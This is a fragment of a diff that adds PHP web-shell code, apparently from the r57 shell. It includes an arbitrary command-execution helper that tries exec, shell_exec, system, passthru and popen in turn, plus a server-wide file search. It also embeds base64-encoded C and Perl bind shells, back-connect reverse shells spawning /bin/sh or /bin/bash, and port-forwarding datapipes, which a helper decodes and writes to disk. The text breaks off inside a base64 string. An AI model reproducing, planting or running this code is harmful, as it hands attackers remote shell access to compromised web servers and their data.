+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Ошибка! �е могу запи�ать в файл '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Ошибка! �е могу прочитать файл '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "�е удало�ь �оздать "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
